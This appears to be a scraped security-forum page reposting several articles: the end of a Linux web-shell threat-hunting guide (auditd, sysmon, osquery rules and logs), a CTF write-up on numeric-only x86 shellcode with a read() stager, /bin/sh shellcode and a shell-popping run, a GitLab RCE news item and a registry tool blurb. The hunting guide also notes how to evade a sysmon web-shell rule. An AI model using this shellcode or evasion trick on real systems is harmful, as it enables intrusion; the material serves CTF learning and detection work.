arch=b64 -F euid=33 -S execve -k detect_execve_www -a always,exit -F arch=b32 -F euid=33 -S execve -k detect_execve_www We run the following commands on our webshell whoami id pwd ls -alh We get the following logs from auditd as parsed by auditbeats. Here is an example of a raw auditd log for whoami type=SYSCALL msg=audit(1637597946.536:10913): arch=c000003e syscall=59 success=yes exit=0 a0=7fb62eb89519 a1=7ffd0906fa70 a2=555f6f1d7f50 a3=1 items=2 ppid=7182 pid=13281 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/dash" subj==unconfined key="detect_execve_www", type=EXECVE msg=audit(1637597946.536:10913): argc=3 a0="sh" a1="-c" a2="whoami", type=PATH msg=audit(1637597946.536:10913): item=0 name="/bin/sh" inode=709 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1637597946.536:10913): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1449 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1637597946.536:10913): proctitle=7368002D630077686F616D69Appendix This allows us to note: euid=33, uid=33 which is www-data comm="sh" exe="/usr/bin/dash” the shell argsc=3 a0="sh" a1="-c" a2="whoami" the commands run on the shell key="detect_execve_www" the key of the auditd alert that was fired Note regarding detect_execve_www Let’s say you decide to use the default rules found in https://github.com/Neo23x0/auditd/blob/master/audit.rules If you try to use ready-made detection rules such as those that come with sigma then you might try to use lnx_auditd_web_rce.yml. If you use this query using the rules from Neo23x0 then you will fail to detect any web shells. This is because the detection rule is detection: selection: type: 'SYSCALL' syscall: 'execve' key: 'detect_execve_www' condition: selection Notice that this filters for the key detect_execve_www but this exact key is not defined anywhere in Neo23x0’s audit.rules ! This is why you should always test your configurations and see if it detects the known bad. In the Neo23x0’s rules, the closest thing you might get are commented out by default ## Suspicious shells #-w /bin/ash -p x -k susp_shell #-w /bin/bash -p x -k susp_shell #-w /bin/csh -p x -k susp_shell #-w /bin/dash -p x -k susp_shell #-w /bin/busybox -p x -k susp_shell #-w /bin/ksh -p x -k susp_shell #-w /bin/fish -p x -k susp_shell #-w /bin/tcsh -p x -k susp_shell #-w /bin/tclsh -p x -k susp_shell #-w /bin/zsh -p x -k susp_shell In this case, our web shell used /bin/dash because it is the default shell used by /bin/shin the current VM I tested this on. So the relevant rule would be -w /bin/dash -p x -k susp_shell But this relies on the usage of /bin/dash buit if the web shell is able to use other shells, then this specific alert will fail. Test your auditd rules on specific scenarios to ensure that it works as expected. For more information on how to write rules for auditd see: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-defining_audit_rules_and_controls https://www.redhat.com/sysadmin/configure-linux-auditing-auditd 1.5 Detection: Looking for command execution for www-data using sysmon MSTIC-Sysmon has two rules for this found individually: T1505.003 T1059.004 Where we can see: Process creation using /bin/bash, /bin/dash, or/bin/sh Process creation with the parent process dash or nginx or … containing and the current command is one of whoami , ifconfig , /usr/bin/ip , etc. If we run whoami in the setup we have, the first rule that will be triggered would T1059.004,TechniqueName=Command and Scripting Interpreter: Unix Shell because of the order of the rules. <Event> <System> <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/> <EventID>1</EventID> <Version>5</Version> <Channel>Linux-Sysmon/Operational</Channel> <Computer>sysmon-test</Computer> <Security UserId="0"/> </System> <EventData> <Data Name="RuleName">TechniqueID=T1059.004,TechniqueName=Command and Scriptin</Data> <Data Name="UtcTime">2021-11-23 14:06:07.116</Data> <Data Name="ProcessGuid">{717481a5-f54f-619c-2d4e-bd5574550000}</Data> <Data Name="ProcessId">11662</Data> <Data Name="Image">/usr/bin/dash</Data> <Data Name="FileVersion">-</Data> <Data Name="Description">-</Data> <Data Name="Product">-</Data> <Data Name="Company">-</Data> <Data Name="OriginalFileName">-</Data> <Data Name="CommandLine">sh -c whoami</Data> <Data Name="CurrentDirectory">/var/www/html</Data> <Data Name="User">www-data</Data> <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data> <Data Name="LogonId">33</Data> <Data Name="TerminalSessionId">4294967295</Data> <Data Name="IntegrityLevel">no level</Data> <Data Name="Hashes">-</Data> <Data Name="ParentProcessGuid">{00000000-0000-0000-0000-000000000000}</Data> <Data Name="ParentProcessId">10242</Data> <Data Name="ParentImage">-</Data> <Data Name="ParentCommandLine">-</Data> <Data Name="ParentUser">-</Data> </EventData> </Event> Here we see /bin/dash being executed that is why the rule was triggered. Afterwards, the rule T1505.003,TechniqueName=Server Software Component: Web Shell is triggered because of whoami . Here is the log for it. I’ve removed some fields for brevity. <Event> <System> <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/> <EventID>1</EventID> </System> <EventData> <Data Name="RuleName">TechniqueID=T1505.003,TechniqueName=Serv</Data> <Data Name="UtcTime">2021-11-23 14:06:07.118</Data> <Data Name="ProcessGuid">{717481a5-f54f-619c-c944-fd0292550000}</Data> <Data Name="ProcessId">11663</Data> <Data Name="Image">/usr/bin/whoami</Data> <Data Name="CommandLine">whoami</Data> <Data Name="CurrentDirectory">/var/www/html</Data> <Data Name="User">www-data</Data> <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data> <Data Name="LogonId">33</Data> <Data Name="ParentProcessId">11662</Data> <Data Name="ParentImage">/usr/bin/dash</Data> <Data Name="ParentCommandLine">sh</Data> <Data Name="ParentUser">www-data</Data> </EventData> </Event> Now with this knowledge, we can bypass T1505.003 sysmon rule. By running system("/bin/bash whoami") so that the parent image of the whoami command would not be dash . This would trigger two T1059.004 alerts. Just for an exercise, if we want to replicate our detect_execve_www in sysmon, we can use the following rule <RuleGroup name="" groupRelation="or"> <ProcessCreate onmatch="include"> <Rule name="detect_shell_www" groupRelation="and"> <User condition="is">www-data</User> <Image condition="contains any">/bin/bash;/bin/dash;/bin/sh;whoami</Image> </Rule> </ProcessCreate> </RuleGroup> And if we want to do basic file integrity monitoring with sysmon we can use <FileCreate onmatch="include"> <Rule name="change_www" groupRelation="or"> <TargetFilename condition="begin with">/var/www/html</TargetFilename> </Rule> </FileCreate> For more information about writing your own sysmon rules you can look at: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#configuration-files https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-the-rules-about-rules/ba-p/733649 https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml https://github.com/microsoft/MSTIC-Sysmon 1.6 Hunting for web shells using osquery For osquery, we might not be able to “find” the web shells itself, but we might be able to find evidence of the webshell. If an attacker uses a web shell, it is possible they will try to establish a reverse shell. If so, we should be an outbound connection from the web server to the attacker. SELECT pid, remote_address, local_port, remote_port, s.state, p.name, p.cmdline, p.uid, username FROM process_open_sockets AS s JOIN processes AS p USING(pid) JOIN users USING(uid) WHERE s.state = 'ESTABLISHED' OR s.state = 'LISTEN'; This look for processes with sockets that have established connections or has a listening port. +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ | pid | remote_address | local_port | remote_port | state | name | cmdline | uid | username | +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ | 14209 | 0.0.0.0 | 22 | 0 | LISTEN | sshd | /usr/sbin/sshd -D | 0 | root | | 468 | 0.0.0.0 | 80 | 0 | LISTEN | nginx | nginx: worker process | 33 | www-data | | 461 | 74.125.200.95 | 51434 | 443 | ESTABLISHED | google_guest_ag | /usr/bin/google_guest_agent | 0 | root | | 8563 | 10.0.0.13 | 39670 | 9200 | ESTABLISHED | auditbeat | /usr/share/auditbeat/bin/auditbeat ... | 0 | root | | 17770 | 6.7.8.9 | 22 | 20901 | ESTABLISHED | sshd | sshd: user@pts/0 | 1000 | user | | 17776 | 1.2.3.4 | 51998 | 1337 | ESTABLISHED | bash | bash | 33 | www-data | +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ Notice we that we see exposed port 22 and port 80 which is normal. We see outbound connections for some binaries used by GCP (my VM is hosted in GCP) as well as the auditbeat service that ships my logs to the SIEM. We also see an active SSH connection from 6.7.8.9 which might be normal. What should catch your eye is the connection pid =17776. It is an outbound connection to port 1337 running shell by www-data! This is probably an active reverse shell! What’s next We’ve discussed basic of monitoring and logging with sysmon, osqueryu, auditd and auditbeats and we have used the case study of how to detect the creation and usage of web shells. In the next blog post we will go through account creation and manipulation. Appendix A00 Setup nginx and php If you want to try this out on your own VM, you need to first setup an nginx server that is configured to use php. (We follow this guide). You need to install nginx and php sudo apt-get update sudo apt-get install nginx sudo apt-get install php-fpm sudo vi /etc/php/7.3/fpm/php.ini # cgi.fix_pathinfo=0 sudo systemctl restart php7.3-fpm sudo vi /etc/nginx/sites-available/default # configure nginx to use php see next codeblock sudo systemctl restart nginx The nginx config might look something like this server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name _; location / { try_files $uri $uri/ =404; } location ~ \\.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.3-fpm.sock; } } Now you should have a web server listening in port 80 that can run php code. Any file that ends with .php will be run as php code. A01 Setup sysmon for linux For sysmon for linux, I was on Debian 10, so based on https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/ wget -q https://packages.microsoft.com/config/debian/10/prod.list sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list sudo apt-get update sudo apt-get install apt-transport-https sudo apt-get update sudo apt-get install sysmonforlinux I used microsoft/MSTIC-Sysmon git clone https://github.com/microsoft/MSTIC-Sysmon.git cd MSTIC-Sysmon/linux/configs sudo sysmon -accepteula -i main.xml # if you are experimenting and want to see all sysmon logs use # sudo sysmon -accepteula -i main.xml Logs should now be available in /var/log/syslog If you want to add rules to main.xml then you can modify it and then reload the config and restart sysmon sudo sysmon -c main.xml sudo sysmtectl restart sysmon A02 Setup auditbeats and auditd for linux Note: Setting up a local elasticsearch clustering is out of scope of this blog post. Elastic has good documentation for auditbeats: https://www.elastic.co/guide/en/beats/auditbeat/7.15/auditbeat-installation-configuration.html curl -L -O https://artifacts.elastic.co/downloads/beats/auditbeat/auditbeat-7.15.2-amd64.deb sudo dpkg -i auditbeat-7.15.2-amd64.deb Modify /etc/auditbeat/auditbeat.yml Add the config for elasticsearch output.elasticsearch: hosts: ["10.10.10.10:9200"] username: "auditbeat_internal" password: "YOUR_PASSWORD" To configure auditd rules, validate location of the audit_rule_files # ... - module: auditd audit_rule_files: [ '${path.config}/audit.rules.d/\*.conf' ] audit_rules: | ## Define audit rules # ... In this case it is in /etc/auditbeat/audit.rules.d/ and I add audit-rules.conf from https://github.com/Neo23x0/auditd/blob/master/audit.rules For some of the custom rules I make I add it in /etc/auditbeat/audit.rules.d/custom.conf Other sources: https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-linux-version-of-the-windows-sysmon-tool/ https://github.com/elastic/integrations/issues/1930 Photo by Brook Anderson on Unsplash Pepe Berba Cloud Security at Thinking Machines| GMON, CCSK | Ex-Machine Learning Researcher and Ex-SOC Engineer Sursa: https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/

November 26, 2021

1 point

Numeric Shellcode

Numeric Shellcode Jan 12, 2021 10 minutes read Introduction In December 2020 I competed in Deloitte’s Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges in various difficulties. One of the final challenges to be released was called numerous presents. This task immediately piqued my interest as it was tagged with the category pwn. The challenge description reads: 600 POINTS - NUMEROUS PRESENTS You deserve a lot of presents! Note: The binary is running on a Ubuntu 20.04 container with ASLR enabled. It is x86 compiled with the flags mentioned in the C file. You can assume that the buffer for your shellcode will be in eax. Tip: use hardware breakpoints for debugging shellcode. Challenge code The challenge is distributed as a .c file with no accompanying reference binary. Personally I’m not a big fan of this approach, the devil is in the details when it comes to binary exploitation, but let’s have a look: #include <stdio.h> // gcc -no-pie -z execstack -m32 -o presents presents.c unsigned char presents[123456] __attribute__ ((aligned (0x20000))); int main(void) { setbuf(stdout, NULL); puts("How many presents do you want?"); printf("> "); scanf("%123456[0-9]", presents); puts("Loading up your presents..!"); ((void(*)())presents)(); } Alright, at least the invocation for gcc is embedded as a comment, and the challenge code itself is brief and and straight forward. There is a static uninitialized buffer presents that resides in the .bss of the program. The libc routine scanf is used to fill this buffer and jump to it. There is one catch though, the format-string used here is %123456[0-9]. This uses the %[ specifier to restrict the allowed input to only the ASCII literals for the numbers 0 till 9 (0x30-0x39). So essentially they are asking us to write a numeric only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence to be found that this is possible when restricted to alpha-numeric characters, but what about numeric-only? Long story short: yes it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately though, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario. Diving in If we set up a clean Ubuntu 20.04 VM and apt install build-essential and build the provided source, we end up with a binary which has the presents global variable located at 0x08080000. Examining the disassembly listing of main we can see the function pointer invocation looks like this: mov eax, 0x8080000 call eax So indeed, like the challenge description suggested EAX contains a pointer to our input/shellcode. So what kind of (useful) instructions can we generate with just 0x30-0x39? Instead of staring at instruction reference manuals and handy tables for too long I opted to brute-force generate valid opcode permutations and disassemble+dedup them. Exclusive ORdinary Instructions There was no easy instructions to do flow control with numerics only, let alone a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind of scratchpad memory as is often seen with alphanumeric shellcoding. Let’s look at some obviously useful candidates though.. they are all xor operations. 34 xx -> xor al, imm8 30 30 -> xor byte ptr [eax], dh 32 30 -> xor dh, byte ptr [eax] 32 38 -> xor bh, byte ptr [eax] 35 xx xx xx xx -> xor eax, imm32 Ofcourse, any immediate operands have to be in the 0x30-0x39 range as well. But these instructions provide a nice starting point. xor byte ptr [eax], dh can be used to (self-)modify code/data if we manage to point eax to the code/data we want to modify. Changing eax arbitrarily is a bit tricky; but with the help of xor eax, imm32 and xor al, imm8 we can create quite a few usable addresses. (More on this in a bit) Writing numeric only shellcode is all about expanding your arsenal of primitives, in a way that eventually yields a desired end result. If we were to start mutating opcodes/instructions using the xor [eax], dh primitive, we need to have a useful value in dh first. Bootstrapping If we look at the register contents of ebx and edx in the context of this particular challenge, we see that ebx points to the start of the .got.plt section (0x0804c000) and edx is clobbered with the value 0xffffffff at the time the trampoline instruction (call eax) to our shellcode is being executed. In short, bh = 0xc0 and dh = 0xff. If we start our journey like this: xor byte ptr [eax], dh ; *(u8*)(eax) ^= 0xff (== 0xcf) xor dh, byte ptr [eax] ; dh ^= 0xcf (== 0x30) xor bh, byte ptr [eax] ; bh ^= 0xcf (== 0x0f) We end up with some (what I would call) useful values in both dh and bh. What exactly makes 0x30 and 0x0f useful though? Well for one, by xor’ing numeric code with 0x30 we can now (relatively) easily introduce the values 0x00-0x09. To be able to arbitrarily carve certain bytes in memory I picked a method that relies on basic add arithmetic. add byte ptr [eax], dh and add byte ptr [eax], bh are almost numeric only. They start with a 0x00 opcode byte though. But this value can now be carved by xor’ing with dh, which contains 0x30. Here it becomes useful that we have a value in dh which only has bits set in the upper nibble, and a value in bh which only has bits set in the lower nibble. By combining a (reasonable!) amount of add arithmetic using bh and dh as increment values we can carve any value we want. So let’s say we want to produce the value 0xCD (CD 80 happens to be a useful sequence of bytes when writing x86/Linux shellcode ;-)). start value = 0x31 0x31 + (0x30 * 2) = 0x91 0x91 + (0x0f * 4) = 0xcd as you can see, with a total of 6 add operations (2 with bh and 4 with bh) we can easily construct the value 0xCD if we start with a numeric value of 0x31. It is fine if we overflow, we are only working with 8bit registers. Pages and overall structure Having the ability to turn numeric bytes into arbitrary bytes is a useful capability, but it heavily relies on being able to control eax to pick what memory locations are being altered. Let’s try to think about our eax-changing capabilities for a bit. We have the xor eax, imm32 and xor al, imm8 instructions at our disposal. Of course, the supplied operands to these instructions need to be in the numeric range. By chaining two xor eax, imm32 operations it becomes possible to set a few nibbles in EAX to arbitrary values, while not breaking the numeric-only rule for the operands. By adding an optional xor al, 0x30 to the end we can toggle the upper nibble of the least significant byte of eax to be 0x30. This gives us a nice range of easily selectable addresses. A quick example would look something like this: ; eax = 0x08080000, our starting address xor eax, 0x30303130 ; eax = 0x38383130 xor eax, 0x30303030 ; eax = 0x08080100 xor al, 0x30 ; eax = 0x08080130 Lets treat the lower 16bits of eax as our selectable address space, we have the ability to select addresses in the form of 0x08080xyz where x and z can be anything between 0 and f and y can be either 3 or 0. In essence, we can easily increase/decrease eax with a granularity of 0x100 and within each 0x100-sized page (from here on, page) we can select addresses 00-0f and 30-3f. I came up with a structure for the shellcode where each page starts with code that patches code in the same page at offset 0x30 and higher, and the code at offset 0x30 and higher in the page then patches the final shellcode. Indeed, we’re using self-modifying code that needs to be self-modified before it can self-modify (yo dawg). Roughly, the layout of our pages look like this: 000: setup code 100: page_patcher_code_0 (patches shellcode_patcher_code_0) 130: shellcode_patcher_code_0 (patches shellcode) 200: page_patcher_code_1 (patches shellcode_patcher_code_1) 230: shellcode_patcher_code_1 (patches shellcode) ... f00: shellcode that gets modified back into original form This means we can have a maximum of up to 14 patch pages (we lose page 0 to setup code), which doesn’t allow us to use very big shellcodes. However, as it turns out, this is enough for a read(stdin, buffer, size) syscall, which was good enough to beat this challenge, and (in general) is enough for staging a larger shellcode. Padding With our limited addressing there’s quite a bit of ‘dead’ space we can’t easily address for modifying. We’ll have to find some numeric-only nop operation so we can slide over these areas. Most of our numeric instructions are exactly 2 bytes, except for xor eax, imm32 which is 5 bytes. The xor eax, imm32 is always used in pairs though, so our numeric code size is always evenly divisble by 2. This means we can use a 2-byte nop instruction and not run into any alignment issues. I picked cmp byte ptr [eax], dh (38 30) as my NOP instruction, as eax always points to a mapped address, and the side-effects are mininmal. Another option would’ve been to use the aaa instruction (37), which is exactly 1 byte in size. But it clobbers al in some cases, so I avoided it. Putting it all together Initially while I was developing this method I manually put together these self modifying numeric only contraptions (well, with some help of GNU assembler macro’s).. which works but is quite a painful and error prone process. Eventually I implemented all the details in an easy to use python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection, and calculating the optimal amount of mutation instructions for generating the shellcode. Do note, this tool was written with the challenge I was facing. You’ll want to modify the three constants (EDX, EBX, EAX) at the top if you plan to reuse my exact tooling. Popping a shell So we’ll write a quick stager shellcode that is compact enough to be num-only-ified. It will use the read syscall to read the next stage of shellcode from stdin. We’ll put the destination buffer right after the stager itself, so there’s no need for trailing nop instructions or control flow divertion. The careful reader will notice I’m not setting edx (which contains the size argument for the read syscall) here since its already set to a big enough value. bits 32 global _start _start: mov ecx, eax ; ecx = eax add ecx, 0xd ; ecx = &_end xor ebx, ebx ; stdin xor eax, eax xor al, 3 ; eax = NR_read int 0x80 _end: That should do the trick. Time to run it through the tool and give it a shot. $ nasm -o stager.bin stager.asm $ xxd stager.bin 00000000: 89c1 83c1 0d31 db31 c034 03cd 80 .....1.1.4... $ python3 numeric_gen.py stager.bin stager_num.bin [~] total patch pages: 14 [>] wrote numeric shellcode to 'stager_num.bin' [~] old length: 13 bytes, new length 3853 (size increase 29638.46%) $ xxd stager_num.bin 00000000: 3030 3230 3238 3530 3030 3035 3031 3030 0020285000050100 00000010: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000020: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000030: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 ... 00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000f00: 3931 3531 3231 3031 3034 3431 32 9151210104412 $ xxd binsh.bin 00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989 1...Phn/shh//bi. 00000010: e389 c1b0 0b52 5153 89e1 cd80 .....RQS.... $ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents How many presents do you want? > Loading up your presents..! id uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) echo w00t w00t ^C Success! As you can see our final numeric shellcode weighs in at 3853 bytes. A little under 4KiB, and well within the allowed limit of 123456 characters. Closing words I hope you enjoyed this article, and I’m eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days. ? – blasty Sursa: https://haxx.in/posts/numeric-shellcode/

November 26, 2021

1 point

Alert! Hackers Exploiting GitLab Unauthenticated RCE Flaw in the Wild

A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks. Tracked as CVE-2021-22205, the issue relates to an improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3. In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly-accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions. Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday. Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In the light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. "In addition, ideally, GitLab should not be an internet facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html

November 3, 2021

1 point

Registry Explorer

Registry Explorer Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include: Show real Registry (not just the standard one) Sort list view by any column Key icons for hives, inaccessible keys, and links Key details: last write time and number of keys/values Displays MUI and REG_EXPAND_SZ expanded values Full search (Find All / Ctrl+Shift+F) Enhanced hex editor for binary values Undo/redo Copy/paste of keys/values Optionally replace RegEdit more to come! Build instructions Build the solution file with Visual Studio 2022 preview. Can be built with Visual Studio 2019 as well (change toolset to v142). Sursa: https://github.com/zodiacon/RegExp

July 26, 2021

1 point

Sign In

Nytro

Points

Posts

u0m3

Points

Posts

akkiliON

Points

Posts

Massaro

Points

Posts

Popular Content

Reverse engineering & modifying Android apps with JADX & Frida

CronRAT: A New Linux Malware That's Scheduled to Run on February 31st

Hunting for Persistence in Linux (Part 1)

Numeric Shellcode

Alert! Hackers Exploiting GitLab Unauthenticated RCE Flaw in the Wild

Registry Explorer

Browse

Activity

Pages